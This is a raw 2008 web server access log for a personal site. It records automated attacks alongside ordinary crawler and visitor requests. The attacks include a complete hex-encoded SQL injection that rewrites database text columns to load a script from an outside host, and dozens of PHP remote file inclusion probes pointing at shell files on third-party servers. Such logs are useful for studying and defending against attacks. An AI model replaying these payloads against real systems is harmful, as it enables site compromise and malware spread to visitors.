91.190.11.65 - - [17/Aug/2008:04:11:09 -0500] "GET /logs/access_log.1201824000?;DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));ExEC(@S); HTTP/1.1" 200 238885 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.5))"
67.195.37.153 - - [17/Aug/2008:04:11:12 -0500] "GET /costume/thmb1.htm HTTP/1.0" 200 3799 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.153 - - [17/Aug/2008:04:11:21 -0500] "GET /costume/thmb4.htm HTTP/1.0" 200 3298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
91.190.11.65 - - [17/Aug/2008:04:11:34 -0500] "GET /logs/access_log.1201824000?';DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));ExEC(@S); HTTP/1.1" 200 238885 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.5))"
151.11.24.250 - - [17/Aug/2008:04:12:08 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
202.181.210.195 - - [17/Aug/2008:04:13:35 -0500] "GET /logs/access_log.1213401600//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
74.6.22.107 - - [17/Aug/2008:04:17:40 -0500] "GET /memorial/index.htm HTTP/1.0" 200 817 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.107 - - [17/Aug/2008:04:18:35 -0500] "GET /logs/access_log.1212883200 HTTP/1.0" 200 303554 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
208.116.1.202 - - [17/Aug/2008:04:18:37 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://securessh.t35.com/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
208.116.1.202 - - [17/Aug/2008:04:18:37 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://securessh.t35.com/id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
208.116.1.202 - - [17/Aug/2008:04:18:40 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://securessh.t35.com/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
208.116.1.202 - - [17/Aug/2008:04:18:40 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://securessh.t35.com/id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
203.251.80.230 - - [17/Aug/2008:04:21:24 -0500] "GET /logs/access_log.1214524800//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 356 "-""libwww-perl/5.79"
203.251.80.230 - - [17/Aug/2008:04:21:25 -0500] "GET //public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
203.251.80.230 - - [17/Aug/2008:04:21:25 -0500] "GET /logs//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 334 "-""libwww-perl/5.79"
208.116.1.202 - - [17/Aug/2008:04:21:44 -0500] "GET /logs/errors.php?error=http://securessh.t35.com/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
208.116.1.202 - - [17/Aug/2008:04:21:45 -0500] "GET /errors.php?error=http://securessh.t35.com/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
74.52.66.242 - - [17/Aug/2008:04:23:29 -0500] "GET /logs/access_log.1214524800///vwar/backup/errors.php?error=http://www.acoc.co.kr/acoc/board/include/idchitoz.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.812"
139.146.145.67 - - [17/Aug/2008:04:24:28 -0500] "GET /logs/access_log.1206230400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.79"
74.6.22.107 - - [17/Aug/2008:04:26:07 -0500] "GET /logs/access_log.1199491200 HTTP/1.0" 200 119983 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
146.96.128.46 - - [17/Aug/2008:04:29:26 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://fdp.de/vorschaltseite/did.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
146.96.128.46 - - [17/Aug/2008:04:29:26 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://fdp.de/vorschaltseite/did.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
146.96.128.46 - - [17/Aug/2008:04:29:26 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://fdp.de/vorschaltseite/did.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
146.96.128.46 - - [17/Aug/2008:04:29:26 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://fdp.de/vorschaltseite/did.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
146.96.128.46 - - [17/Aug/2008:04:29:26 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://fdp.de/vorschaltseite/did.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
74.6.22.107 - - [17/Aug/2008:04:38:13 -0500] "GET /artwork/miscellaneous.htm HTTP/1.0" 404 297 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
69.61.106.55 - - [17/Aug/2008:04:39:55 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://fdp.de/vorschaltseite/did.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.812"
69.61.106.55 - - [17/Aug/2008:04:39:55 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://fdp.de/vorschaltseite/did.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.812"
217.25.160.1 - - [17/Aug/2008:04:41:13 -0500] "GET /logs/access_log.1214524800//config.php?_CCFG[_PKG_PATH_DBSE]=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.803"
217.25.160.1 - - [17/Aug/2008:04:41:13 -0500] "GET //config.php?_CCFG[_PKG_PATH_DBSE]=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
217.25.160.1 - - [17/Aug/2008:04:41:14 -0500] "GET /logs//config.php?_CCFG[_PKG_PATH_DBSE]=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
74.52.66.242 - - [17/Aug/2008:04:43:31 -0500] "GET /logs/access_log.1214438400///vwar/backup/errors.php?error=http://www.acoc.co.kr/acoc/board/include/idchitoz.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.812"
217.25.160.1 - - [17/Aug/2008:04:43:41 -0500] "GET /logs/access_log.1214524800//config.php?_CCFG[_PKG_PATH_DBSE]=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.803"
217.25.160.1 - - [17/Aug/2008:04:43:41 -0500] "GET //config.php?_CCFG[_PKG_PATH_DBSE]=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
217.25.160.1 - - [17/Aug/2008:04:43:44 -0500] "GET /logs//config.php?_CCFG[_PKG_PATH_DBSE]=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
77.240.226.168 - - [17/Aug/2008:04:49:42 -0500] "GET /logs/scanhttp://illeganza.altervista.org/id.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.808"
77.240.226.168 - - [17/Aug/2008:04:49:43 -0500] "GET /scanhttp://illeganza.altervista.org/id.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.808"
89.108.66.136 - - [17/Aug/2008:04:50:08 -0500] "GET /logs//?path%5Bdocroot%5D=http://sibtorg.com/shop/usr/extensions/id.txt??? HTTP/1.1" 200 95586 "-""libwww-perl/5.812"
89.108.66.136 - - [17/Aug/2008:04:50:09 -0500] "GET //?path%5Bdocroot%5D=http://sibtorg.com/shop/usr/extensions/id.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.812"
89.218.85.18 - - [17/Aug/2008:04:50:32 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://64.251.8.142/safe.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
89.218.85.18 - - [17/Aug/2008:04:50:32 -0500] "GET //config/dbutil.bck.php?confdir=http://64.251.8.142/safe.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
89.108.66.136 - - [17/Aug/2008:04:51:32 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://sibtorg.com/shop/usr/extensions/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.812"
89.108.66.136 - - [17/Aug/2008:04:51:32 -0500] "GET //?path%5Bdocroot%5D=http://sibtorg.com/shop/usr/extensions/id.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.812"
89.108.66.136 - - [17/Aug/2008:04:51:34 -0500] "GET /logs//?path%5Bdocroot%5D=http://sibtorg.com/shop/usr/extensions/id.txt??? HTTP/1.1" 200 95586 "-""libwww-perl/5.812"
83.172.140.17 - - [17/Aug/2008:04:52:53 -0500] "GET /logs/errors.php?error=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
83.172.140.17 - - [17/Aug/2008:04:52:54 -0500] "GET /errors.php?error=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
83.172.140.17 - - [17/Aug/2008:04:56:08 -0500] "GET /errors.php?error=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
86.58.154.237 - - [17/Aug/2008:04:57:10 -0500] "GET /logs/errors.php?error=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
86.58.154.237 - - [17/Aug/2008:04:57:11 -0500] "GET /errors.php?error=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
86.58.154.237 - - [17/Aug/2008:04:57:16 -0500] "GET /errors.php?error=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
151.11.24.250 - - [17/Aug/2008:04:57:21 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://goodscanid.thewomanizer.net/good.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
151.11.24.250 - - [17/Aug/2008:04:57:22 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://goodscanid.thewomanizer.net/good.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
151.11.24.250 - - [17/Aug/2008:04:57:31 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://goodscanid.thewomanizer.net/good.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
151.11.24.250 - - [17/Aug/2008:04:57:32 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://goodscanid.thewomanizer.net/good.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
89.218.85.18 - - [17/Aug/2008:04:58:56 -0500] "GET /logs//include/write.php?dir=http://64.251.8.142/safe.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
89.218.85.18 - - [17/Aug/2008:04:58:56 -0500] "GET //include/write.php?dir=http://64.251.8.142/safe.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
66.216.91.226 - - [17/Aug/2008:04:59:12 -0500] "GET /logs/errors.php?error=http://www.latinoconvention.com/mambots/system/.sys/.../id5.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
66.216.91.226 - - [17/Aug/2008:04:59:12 -0500] "GET /errors.php?error=http://www.latinoconvention.com/mambots/system/.sys/.../id5.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
74.55.113.226 - - [17/Aug/2008:04:59:42 -0500] "GET /errors.php?error=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.248.110.152 - - [17/Aug/2008:05:00:36 -0500] "GET /logs/access_log.1209600000//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://gillbott1.netfirms.com/bbs//skin/zero_vote/mraneti.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
89.248.110.152 - - [17/Aug/2008:05:00:36 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://gillbott1.netfirms.com/bbs//skin/zero_vote/mraneti.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.248.110.152 - - [17/Aug/2008:05:00:36 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://gillbott1.netfirms.com/bbs//skin/zero_vote/mraneti.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.248.110.152 - - [17/Aug/2008:05:00:36 -0500] "GET /logs/access_log.1203724800//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://gillbott1.netfirms.com/bbs//skin/zero_vote/mraneti.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
151.11.24.250 - - [17/Aug/2008:05:00:58 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://goodscanid.thewomanizer.net/good.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
74.55.113.226 - - [17/Aug/2008:05:01:14 -0500] "GET /logs/errors.php?error=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
74.55.113.226 - - [17/Aug/2008:05:01:15 -0500] "GET /errors.php?error=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
151.11.24.250 - - [17/Aug/2008:05:01:46 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://goodscanid.thewomanizer.net/good.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
151.11.24.250 - - [17/Aug/2008:05:01:46 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://goodscanid.thewomanizer.net/good.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
89.248.110.152 - - [17/Aug/2008:05:01:59 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://gillbott1.netfirms.com/bbs//skin/zero_vote/mraneti.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.248.110.152 - - [17/Aug/2008:05:01:59 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://gillbott1.netfirms.com/bbs//skin/zero_vote/mraneti.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.248.110.152 - - [17/Aug/2008:05:01:59 -0500] "GET /logs/access_log.1206230400//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://gillbott1.netfirms.com/bbs//skin/zero_vote/mraneti.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
203.251.80.230 - - [17/Aug/2008:05:02:26 -0500] "GET /logs/access_log.1206230400//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://gillbott1.netfirms.com/bbs//skin/zero_vote/mraneti.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
203.251.80.230 - - [17/Aug/2008:05:02:26 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://gillbott1.netfirms.com/bbs//skin/zero_vote/mraneti.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
203.251.80.230 - - [17/Aug/2008:05:02:26 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://gillbott1.netfirms.com/bbs//skin/zero_vote/mraneti.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
66.216.91.226 - - [17/Aug/2008:05:02:27 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../id5.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
66.216.91.226 - - [17/Aug/2008:05:02:28 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../id5.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
203.251.80.230 - - [17/Aug/2008:05:02:28 -0500] "GET /logs/access_log.1203724800//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://gillbott1.netfirms.com/bbs//skin/zero_vote/mraneti.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
67.15.48.60 - - [17/Aug/2008:05:02:29 -0500] "GET /logs/access_log.1206230400//index.php?view=page&pagename=http://thepornhandbook.com/templates/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
67.15.48.60 - - [17/Aug/2008:05:02:29 -0500] "GET //index.php?view=page&pagename=http://thepornhandbook.com/templates/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.15.48.60 - - [17/Aug/2008:05:02:30 -0500] "GET /logs//index.php?view=page&pagename=http://thepornhandbook.com/templates/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
83.172.140.17 - - [17/Aug/2008:05:03:07 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
83.172.140.17 - - [17/Aug/2008:05:03:08 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
151.11.24.250 - - [17/Aug/2008:05:03:28 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://goodscanid.thewomanizer.net/good.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
151.11.24.250 - - [17/Aug/2008:05:03:29 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://goodscanid.thewomanizer.net/good.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
86.58.154.237 - - [17/Aug/2008:05:03:33 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
86.58.154.237 - - [17/Aug/2008:05:03:33 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
216.246.8.237 - - [17/Aug/2008:05:04:00 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://209.85.60.69/~forohipn/otro/clientscript/vbulletin_css/fonts.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.811"
216.246.8.237 - - [17/Aug/2008:05:04:00 -0500] "GET //include/admin.lib.inc.php?site_path=http://209.85.60.69/~forohipn/otro/clientscript/vbulletin_css/fonts.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.811"
74.55.113.226 - - [17/Aug/2008:05:04:36 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
74.55.113.226 - - [17/Aug/2008:05:04:36 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
203.251.80.230 - - [17/Aug/2008:05:04:56 -0500] "GET /logs/access_log.1214438400//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 356 "-""libwww-perl/5.79"
203.251.80.230 - - [17/Aug/2008:05:05:33 -0500] "GET /logs/access_log.1206230400//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://gillbott1.netfirms.com/bbs//skin/zero_vote/mraneti.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
203.251.80.230 - - [17/Aug/2008:05:05:33 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://gillbott1.netfirms.com/bbs//skin/zero_vote/mraneti.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
203.251.80.230 - - [17/Aug/2008:05:05:33 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://gillbott1.netfirms.com/bbs//skin/zero_vote/mraneti.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
203.251.80.230 - - [17/Aug/2008:05:06:01 -0500] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://gillbott1.netfirms.com/bbs//skin/zero_vote/mraneti.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
203.251.80.230 - - [17/Aug/2008:05:06:02 -0500] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://gillbott1.netfirms.com/bbs//skin/zero_vote/mraneti.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
203.251.80.230 - - [17/Aug/2008:05:06:02 -0500] "GET /logs/access_log.1213488000//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://gillbott1.netfirms.com/bbs//skin/zero_vote/mraneti.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
89.248.110.152 - - [17/Aug/2008:05:07:56 -0500] "GET /logs/access_log.1213488000//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://gillbott1.netfirms.com/bbs//skin/zero_vote/mraneti.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
89.248.110.152 - - [17/Aug/2008:05:07:56 -0500] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://gillbott1.netfirms.com/bbs//skin/zero_vote/mraneti.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.248.110.152 - - [17/Aug/2008:05:07:56 -0500] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://gillbott1.netfirms.com/bbs//skin/zero_vote/mraneti.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
24.80.168.236 - - [17/Aug/2008:05:08:53 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
24.80.168.236 - - [17/Aug/2008:05:08:53 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
24.80.168.236 - - [17/Aug/2008:05:08:54 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
24.80.168.236 - - [17/Aug/2008:05:08:54 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
24.80.168.236 - - [17/Aug/2008:05:08:54 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
24.80.168.236 - - [17/Aug/2008:05:09:08 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
24.80.168.236 - - [17/Aug/2008:05:09:11 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2676 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
74.52.66.242 - - [17/Aug/2008:05:09:11 -0500] "GET /logs/access_log.1214179200///vwar/backup/errors.php?error=http://www.acoc.co.kr/acoc/board/include/idchitoz.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.812"
24.80.168.236 - - [17/Aug/2008:05:09:11 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
24.80.168.236 - - [17/Aug/2008:05:09:12 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
24.80.168.236 - - [17/Aug/2008:05:09:12 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
24.80.168.236 - - [17/Aug/2008:05:09:12 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
24.80.168.236 - - [17/Aug/2008:05:09:12 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
24.80.168.236 - - [17/Aug/2008:05:09:12 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
